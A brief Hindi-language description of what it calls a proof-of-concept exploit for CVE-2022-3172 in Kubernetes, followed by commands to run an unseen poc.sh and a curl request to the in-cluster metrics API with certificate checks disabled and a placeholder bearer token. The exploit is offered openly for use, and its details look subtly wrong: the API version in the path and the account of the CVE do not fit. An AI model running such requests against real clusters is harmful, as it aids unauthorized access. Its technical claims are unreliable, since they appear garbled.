
CVE-2022-3172 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Kubernetes में एक क्राफ्टेड टोकन के माध्यम से मेट्रिक्स API तक अनधिकृत पहुंच को प्रदर्शित करता है।
chmod +x poc.sh
./poc.sh
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"